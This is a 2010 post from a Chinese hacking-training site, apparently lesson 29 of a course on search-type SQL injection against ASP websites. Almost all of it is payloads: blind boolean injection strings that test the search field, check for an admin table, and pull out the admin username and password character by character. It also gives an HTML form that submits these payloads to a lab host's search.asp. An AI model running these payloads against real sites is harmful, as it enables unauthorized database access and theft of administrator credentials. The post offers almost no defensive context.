|
|
饭客网络一周年免费培训之脚本渗透第二十九课:asp搜索型注入
www.hackfans.com.cn
饭客网络安全培训基地
中国最大的网络安全培训
只做网络安全 信息安全方面的培训
宗旨:坚持 宣传 信誉 实力 回报
专业培训网络信息安全人才 成就中国网络安全边防军团
--------------------------------------------------------------------------------
教程名称:asp搜索型注入
讲师:I.n.c゛啵、 QQ:380****7774
测试%' and 1=1 and '%'=' //1=1返回找到一个,即正常
测试%' and 1=2 and '%'=' //1=2显然不成立,找不到任何文章,即返回异常
测试%' and (select count(pass) from zm_admin) and '%'=' //返回正常说明存在zm_admin表
存在name和pass
测试%' and (select top 1 len(pass) from zm_admin)>1 and '%'='
测试%' and (select top 1 asc(mid(name,4,1)) from zm_admin)>96 and '%'='
admin admin
--------------------------------------------------------
<html>
<form name="form1" method="post" action="http://192.168.1.102/search.asp">
类型:
<label>
<input name="t" type="text" id="t" value="1">
</label>
<p>
内容:
<label>
<input name="key" type="text" id="key">
</label>
</p>
<p>
<label>
<input type="submit" name="Submit" value="提交">
</label>
</p>
</form>
教程下载地址:
http://www.hackfans.com.cn/mianfei/jiaoben/jb29rar |
|
发表于 2010-12-30 23:26:59